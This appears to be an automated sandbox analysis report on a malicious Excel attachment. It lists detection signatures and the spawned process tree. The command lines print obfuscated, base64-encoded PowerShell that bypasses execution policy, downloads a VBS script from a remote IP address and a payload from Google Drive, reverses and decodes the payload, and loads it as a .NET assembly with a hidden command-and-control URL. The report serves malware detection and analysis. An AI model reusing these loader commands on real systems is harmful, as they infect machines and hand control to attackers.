Edit tour
Windows
Analysis Report
A & C Metrology OC 5457144.xls
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3404 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3688 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 3772 cmdline:
"C:\Window s\syStem32 \wiNdOWSPO wErsHElL\v 1.0\POWeRs hElL.eXE" "PoWeRSheL l.Exe -ex BYpass -NoP -W 1 -c dEvIc ECRedEntia LdePlOymeN t ; iEx($( Iex('[SysT em.TEXT.EN coDIng]'+[ chAR]58+[C HaR]0x3A+' Utf8.gETST RING([SYSt EM.COnVErT ]'+[Char]5 8+[CHar]0x 3a+'frOMba SE64StrInG ('+[cHar]3 4+'JGJxbEl EWUQgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgID0gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI GFkZC1UeVB FICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtTWVNQ mVyREVmaW5 pdElPbiAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgJ 1tEbGxJbXB vcnQoInVyb G1vTiIsICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB DaGFyU2V0I D0gQ2hhclN ldC5Vbmljb 2RlKV1wdWJ saWMgc3Rhd GljIGV4dGV ybiBJbnRQd HIgVVJMRG9 3bmxvYWRUb 0ZpbGUoSW5 0UHRyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBYd HJiSHMsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBub GNyLHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgR3l2c ix1aW50ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB 1LEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQSk7JyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW5hTUUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJicSIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 OYU1FU3BhQ 0UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIFpYYSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgJGJ xbElEWUQ6O lVSTERvd25 sb2FkVG9Ga WxlKDAsImh 0dHA6Ly8xO TIuMjEwLjI xNS44LzU0M C9jcmVhdGV kYmVzdHRoa W5nc3dpdGh uaWNld29ya 2dyZWF0aC5 0SUYiLCIkR W5WOkFQUER BVEFcY3JlY XRlZGJlc3R 0aGluZ3N3a XRobmljZXd vcmtncmVhd C52YlMiLDA sMCk7U1RhU lQtc0xlZVA oMyk7c3RBc lQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkZW5 2OkFQUERBV EFcY3JlYXR lZGJlc3R0a GluZ3N3aXR obmljZXdvc mtncmVhdC5 2YlMi'+[CH Ar]0X22+') )')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3876 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ex BYpass -NoP -W 1 -c dEvIcE CRedEntiaL dePlOymeNt MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3980 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\td4qmp aq\td4qmpa q.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3988 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES955D.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\td4 qmpaq\CSC7 C3FCBBFF45 2466CBE70A A6FD2E366A .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 4080 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\creat edbestthin gswithnice workgreat. vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 2504 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRlTn Y6Y29tU3Bl Q1s0LDE1LD I1XS1qb2lu JycpICggKC gnRzJOaW1h Z2VVcmwgPS BtODdodHRw czovL2RyaX ZlLmdvb2ds ZS5jb20vdW M/ZXhwb3J0 PWRvd25sb2 FkJmlkPTFB SVZnSkpKdj FGNicrJ3ZT NHNVT3libk gtc0R2VScr J2hCWXd1ci BtODc7RzJO d2ViQ2xpZW 50ID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDtH Mk5pbWFnZU J5dGVzID0g RzJOd2ViQ2 xpZW50LkRv d25sb2FkRG F0YShHMk5p bWFnZVVybC k7RzJOaW1h Z2UnKydUZX h0ID0gW1N5 c3RlbS5UZX h0LkVuY29k aScrJ25nXT o6VVRGOC5H ZXRTdHJpbm coRzJOaW1h Z2VCeXRlJy sncyk7RzJO c3RhcnRGbG FnID0gbTg3 PDxCQVNFNj RfU1RBUlQ+ Pm04NztHMk 5lbmRGbGFn ID0gbTg3PD xCQVNFNjRf RU5EPj5tJy snODc7RzJO c3RhcnRJbm RleCcrJyA9 ICcrJ0cyTm ltJysnYWdl VGV4dC5Jbm RleE9mKEcy TnN0YXJ0Rm xhZyk7RzJO ZW5kSW5kZX ggPSBHMk5p bWFnZVRleH QnKycuSW5k ZXhPZicrJy hHMk5lbmRG bGFnKTtHMk 5zdGFydElu ZCcrJ2V4IC crJy1nZSAw IC1hbmQnKy cgRzJOZW5k SW5kZXggLW d0IEcyTnN0 YXJ0SW5kZX g7RzJOc3Rh cnRJbmRleC ArPSBHMk5z dGFydEZsYW cuTGUnKydu Z3RoO0cyTm Jhc2U2NExl bmd0aCA9IE cyTmVuZElu ZGV4IC0gRz JOc3RhcnRJ bmRleDtHMk 5iYXNlNjRD Jysnb21tYW 5kID0gRzJO aW1hZ2VUZX h0LicrJ1N1 YnN0cmluZy hHMk5zdCcr J2FydEluJy snZGV4LCBH Mk5iYXNlNj RMZW5nJysn dGgpO0cyTm Jhc2U2NFJl dmUnKydyc2 VkID0gLWpv aW4nKycgKE cyTmInKydh c2U2NENvbW 1hbmQuVG9D aGFyQXJyYX koKSAnKydD SUsgRm9yRW FjaC1PYmpl Y3QgeyBHMk 5fIH0pWy0x Li4tKEcyTm Jhc2U2NENv bW1hbmQuTG VuZ3RoKV0n Kyc7RzJOY2 9tbWFuZEJ5 dGVzID0gW1 N5c3RlbS5D b252ZXJ0XT o6RicrJ3Jv bUJhc2U2NF N0cmluZyhH Mk5iYXNlNj RSZXZlcnNl ZCk7RzJObG 9hZGVkQXNz ZW1iJysnbH kgPSAnKydb U3lzdCcrJ2 VtLlJlZmxl Y3Rpb24uQX MnKydzZW1i bHldOjpMb2 FkKEcyTmNv bW1hbmRCeX Rlcyk7RzJO dmFpTWV0aG 9kID0gW2Ru bGliLklPLk hvbWVdLkdl dE1ldGhvZC htODdWQUlt ODcpO0cyTn ZhaU1ldGhv ZC5JbnZva2 UoRzJObnVs bCwgQChtOD d0eHQuUkRG RlJFJysnLz A0NScrJy84 LjUxMi4wMT IuMjkxLy86 cHR0aG04Ny wgbTg3ZGUn KydzYXRpdm Fkb204Nywg bScrJzg3ZG VzYXRpdmEn Kydkb204Ny wgbTg3ZGVz YXRpdmFkb2 04NywgbTg3 QWRkSW5Qcm 9jZXNzMzJt ODcsIG04Jy snN2Rlc2F0 aXZhZG9tOD csIG04Jysn N2Rlc2F0aX ZhZG9tODcs bTg3ZGVzYX RpdmFkb204 NyxtODdkZX NhdGl2YWRv bTg3LG04N2 Rlc2F0aXZh ZG9tODcsbT g3ZGVzYXRp dmFkb204Ny xtODdkZXNh dGknKyd2YW RvbTg3LG04 NzFtODcsbT g3ZGVzYXRp dmFkb204Ny kpOycpIC1S RVBMYUNFKF tDSEFyXTcx K1tDSEFyXT UwK1tDSEFy XTc4KSxbQ0 hBcl0zNi1S RVBMYUNFJ2 04NycsW0NI QXJdMzktQ3 JlcExBY0Ug IChbQ0hBcl 02NytbQ0hB cl03MytbQ0 hBcl03NSks W0NIQXJdMT I0KSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 204 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ eNv:comSpe C[4,15,25] -join'') ( (('G2Nima geUrl = m8 7https://d rive.googl e.com/uc?e xport=down load&id=1A IVgJJJv1F6 '+'vS4sUOy bnH-sDvU'+ 'hBYwur m8 7;G2NwebCl ient = New -Object Sy stem.Net.W ebClient;G 2NimageByt es = G2Nwe bClient.Do wnloadData (G2NimageU rl);G2Nima ge'+'Text = [System. Text.Encod i'+'ng]::U TF8.GetStr ing(G2Nima geByte'+'s );G2Nstart Flag = m87 <<BASE64_S TART>>m87; G2NendFlag = m87<<BA SE64_END>> m'+'87;G2N startIndex '+' = '+'G 2Nim'+'age Text.Index Of(G2Nstar tFlag);G2N endIndex = G2NimageT ext'+'.Ind exOf'+'(G2 NendFlag); G2NstartIn d'+'ex '+' -ge 0 -and '+' G2Nend Index -gt G2NstartIn dex;G2Nsta rtIndex += G2NstartF lag.Le'+'n gth;G2Nbas e64Length = G2NendIn dex - G2Ns tartIndex; G2Nbase64C '+'ommand = G2Nimage Text.'+'Su bstring(G2 Nst'+'artI n'+'dex, G 2Nbase64Le ng'+'th);G 2Nbase64Re ve'+'rsed = -join'+' (G2Nb'+'a se64Comman d.ToCharAr ray() '+'C IK ForEach -Object { G2N_ })[-1 ..-(G2Nbas e64Command .Length)]' +';G2Ncomm andBytes = [System.C onvert]::F '+'romBase 64String(G 2Nbase64Re versed);G2 NloadedAss emb'+'ly = '+'[Syst' +'em.Refle ction.As'+ 'sembly]:: Load(G2Nco mmandBytes );G2NvaiMe thod = [dn lib.IO.Hom e].GetMeth od(m87VAIm 87);G2Nvai Method.Inv oke(G2Nnul l, @(m87tx t.RDFFRE'+ '/045'+'/8 .512.012.2 91//:ptthm 87, m87de' +'sativado m87, m'+'8 7desativa' +'dom87, m 87desativa dom87, m87 AddInProce ss32m87, m 8'+'7desat ivadom87, m8'+'7desa tivadom87, m87desativ adom87,m87 desativado m87,m87des ativadom87 ,m87desati vadom87,m8 7desati'+' vadom87,m8 71m87,m87d esativadom 87));') -R EPLaCE([CH Ar]71+[CHA r]50+[CHAr ]78),[CHAr ]36-REPLaC E'm87',[CH Ar]39-Crep LAcE ([CHA r]67+[CHAr ]73+[CHAr] 75),[CHAr] 124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - mshta.exe (PID: 1884 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 1040 cmdline:
"C:\Window s\syStem32 \wiNdOWSPO wErsHElL\v 1.0\POWeRs hElL.eXE" "PoWeRSheL l.Exe -ex BYpass -NoP -W 1 -c dEvIc ECRedEntia LdePlOymeN t ; iEx($( Iex('[SysT em.TEXT.EN coDIng]'+[ chAR]58+[C HaR]0x3A+' Utf8.gETST RING([SYSt EM.COnVErT ]'+[Char]5 8+[CHar]0x 3a+'frOMba SE64StrInG ('+[cHar]3 4+'JGJxbEl EWUQgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgID0gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI GFkZC1UeVB FICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtTWVNQ mVyREVmaW5 pdElPbiAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgJ 1tEbGxJbXB vcnQoInVyb G1vTiIsICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB DaGFyU2V0I D0gQ2hhclN ldC5Vbmljb 2RlKV1wdWJ saWMgc3Rhd GljIGV4dGV ybiBJbnRQd HIgVVJMRG9 3bmxvYWRUb 0ZpbGUoSW5 0UHRyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBYd HJiSHMsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBub GNyLHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgR3l2c ix1aW50ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB 1LEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQSk7JyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW5hTUUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJicSIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 OYU1FU3BhQ 0UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIFpYYSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgJGJ xbElEWUQ6O lVSTERvd25 sb2FkVG9Ga WxlKDAsImh 0dHA6Ly8xO TIuMjEwLjI xNS44LzU0M C9jcmVhdGV kYmVzdHRoa W5nc3dpdGh uaWNld29ya 2dyZWF0aC5 0SUYiLCIkR W5WOkFQUER BVEFcY3JlY XRlZGJlc3R 0aGluZ3N3a XRobmljZXd vcmtncmVhd C52YlMiLDA sMCk7U1RhU lQtc0xlZVA oMyk7c3RBc lQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkZW5 2OkFQUERBV EFcY3JlYXR lZGJlc3R0a GluZ3N3aXR obmljZXdvc mtncmVhdC5 2YlMi'+[CH Ar]0X22+') )')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 1208 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ex BYpass -NoP -W 1 -c dEvIcE CRedEntiaL dePlOymeNt MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 1132 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\mans50 4x\mans504 x.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 848 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESD71D.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\man s504x\CSCC EA378A2A3F 7449F819B5 EAA6DFD95A .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3584 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\creat edbestthin gswithnice workgreat. vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3732 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRlTn Y6Y29tU3Bl Q1s0LDE1LD I1XS1qb2lu JycpICggKC gnRzJOaW1h Z2VVcmwgPS BtODdodHRw czovL2RyaX ZlLmdvb2ds ZS5jb20vdW M/ZXhwb3J0 PWRvd25sb2 FkJmlkPTFB SVZnSkpKdj FGNicrJ3ZT NHNVT3libk gtc0R2VScr J2hCWXd1ci BtODc7RzJO d2ViQ2xpZW 50ID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDtH Mk5pbWFnZU J5dGVzID0g RzJOd2ViQ2 xpZW50LkRv d25sb2FkRG F0YShHMk5p bWFnZVVybC k7RzJOaW1h Z2UnKydUZX h0ID0gW1N5 c3RlbS5UZX h0LkVuY29k aScrJ25nXT o6VVRGOC5H ZXRTdHJpbm coRzJOaW1h Z2VCeXRlJy sncyk7RzJO c3RhcnRGbG FnID0gbTg3 PDxCQVNFNj RfU1RBUlQ+ Pm04NztHMk 5lbmRGbGFn ID0gbTg3PD xCQVNFNjRf RU5EPj5tJy snODc7RzJO c3RhcnRJbm RleCcrJyA9 ICcrJ0cyTm ltJysnYWdl VGV4dC5Jbm RleE9mKEcy TnN0YXJ0Rm xhZyk7RzJO ZW5kSW5kZX ggPSBHMk5p bWFnZVRleH QnKycuSW5k ZXhPZicrJy hHMk5lbmRG bGFnKTtHMk 5zdGFydElu ZCcrJ2V4IC crJy1nZSAw IC1hbmQnKy cgRzJOZW5k SW5kZXggLW d0IEcyTnN0 YXJ0SW5kZX g7RzJOc3Rh cnRJbmRleC ArPSBHMk5z dGFydEZsYW cuTGUnKydu Z3RoO0cyTm Jhc2U2NExl bmd0aCA9IE cyTmVuZElu ZGV4IC0gRz JOc3RhcnRJ bmRleDtHMk 5iYXNlNjRD Jysnb21tYW 5kID0gRzJO aW1hZ2VUZX h0LicrJ1N1 YnN0cmluZy hHMk5zdCcr J2FydEluJy snZGV4LCBH Mk5iYXNlNj RMZW5nJysn dGgpO0cyTm Jhc2U2NFJl dmUnKydyc2 VkID0gLWpv aW4nKycgKE cyTmInKydh c2U2NENvbW 1hbmQuVG9D aGFyQXJyYX koKSAnKydD SUsgRm9yRW FjaC1PYmpl Y3QgeyBHMk 5fIH0pWy0x Li4tKEcyTm Jhc2U2NENv bW1hbmQuTG VuZ3RoKV0n Kyc7RzJOY2 9tbWFuZEJ5 dGVzID0gW1 N5c3RlbS5D b252ZXJ0XT o6RicrJ3Jv bUJhc2U2NF N0cmluZyhH Mk5iYXNlNj RSZXZlcnNl ZCk7RzJObG 9hZGVkQXNz ZW1iJysnbH kgPSAnKydb U3lzdCcrJ2 VtLlJlZmxl Y3Rpb24uQX MnKydzZW1i bHldOjpMb2 FkKEcyTmNv bW1hbmRCeX Rlcyk7RzJO dmFpTWV0aG 9kID0gW2Ru bGliLklPLk hvbWVdLkdl dE1ldGhvZC htODdWQUlt ODcpO0cyTn ZhaU1ldGhv ZC5JbnZva2 UoRzJObnVs bCwgQChtOD d0eHQuUkRG RlJFJysnLz A0NScrJy84 LjUxMi4wMT IuMjkxLy86 cHR0aG04Ny wgbTg3ZGUn KydzYXRpdm Fkb204Nywg bScrJzg3ZG VzYXRpdmEn Kydkb204Ny wgbTg3ZGVz YXRpdmFkb2 04NywgbTg3 QWRkSW5Qcm 9jZXNzMzJt ODcsIG04Jy snN2Rlc2F0 aXZhZG9tOD csIG04Jysn N2Rlc2F0aX ZhZG9tODcs bTg3ZGVzYX RpdmFkb204 NyxtODdkZX NhdGl2YWRv bTg3LG04N2 Rlc2F0aXZh ZG9tODcsbT g3ZGVzYXRp dmFkb204Ny xtODdkZXNh dGknKyd2YW RvbTg3LG04 NzFtODcsbT g3ZGVzYXRp dmFkb204Ny kpOycpIC1S RVBMYUNFKF tDSEFyXTcx K1tDSEFyXT UwK1tDSEFy XTc4KSxbQ0 hBcl0zNi1S RVBMYUNFJ2 04NycsW0NI QXJdMzktQ3 JlcExBY0Ug IChbQ0hBcl 02NytbQ0hB cl03MytbQ0 hBcl03NSks W0NIQXJdMT I0KSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3900 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ eNv:comSpe C[4,15,25] -join'') ( (('G2Nima geUrl = m8 7https://d rive.googl e.com/uc?e xport=down load&id=1A IVgJJJv1F6 '+'vS4sUOy bnH-sDvU'+ 'hBYwur m8 7;G2NwebCl ient = New -Object Sy stem.Net.W ebClient;G 2NimageByt es = G2Nwe bClient.Do wnloadData (G2NimageU rl);G2Nima ge'+'Text = [System. Text.Encod i'+'ng]::U TF8.GetStr ing(G2Nima geByte'+'s );G2Nstart Flag = m87 <<BASE64_S TART>>m87; G2NendFlag = m87<<BA SE64_END>> m'+'87;G2N startIndex '+' = '+'G 2Nim'+'age Text.Index Of(G2Nstar tFlag);G2N endIndex = G2NimageT ext'+'.Ind exOf'+'(G2 NendFlag); G2NstartIn d'+'ex '+' -ge 0 -and '+' G2Nend Index -gt G2NstartIn dex;G2Nsta rtIndex += G2NstartF lag.Le'+'n gth;G2Nbas e64Length = G2NendIn dex - G2Ns tartIndex; G2Nbase64C '+'ommand = G2Nimage Text.'+'Su bstring(G2 Nst'+'artI n'+'dex, G 2Nbase64Le ng'+'th);G 2Nbase64Re ve'+'rsed = -join'+' (G2Nb'+'a se64Comman d.ToCharAr ray() '+'C IK ForEach -Object { G2N_ })[-1 ..-(G2Nbas e64Command .Length)]' +';G2Ncomm andBytes = [System.C onvert]::F '+'romBase 64String(G 2Nbase64Re versed);G2 NloadedAss emb'+'ly = '+'[Syst' +'em.Refle ction.As'+ 'sembly]:: Load(G2Nco mmandBytes );G2NvaiMe thod = [dn lib.IO.Hom e].GetMeth od(m87VAIm 87);G2Nvai Method.Inv oke(G2Nnul l, @(m87tx t.RDFFRE'+ '/045'+'/8 .512.012.2 91//:ptthm 87, m87de' +'sativado m87, m'+'8 7desativa' +'dom87, m 87desativa dom87, m87 AddInProce ss32m87, m 8'+'7desat ivadom87, m8'+'7desa tivadom87, m87desativ adom87,m87 desativado m87,m87des ativadom87 ,m87desati vadom87,m8 7desati'+' vadom87,m8 71m87,m87d esativadom 87));') -R EPLaCE([CH Ar]71+[CHA r]50+[CHAr ]78),[CHAr ]36-REPLaC E'm87',[CH Ar]39-Crep LAcE ([CHA r]67+[CHAr ]73+[CHAr] 75),[CHAr] 124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |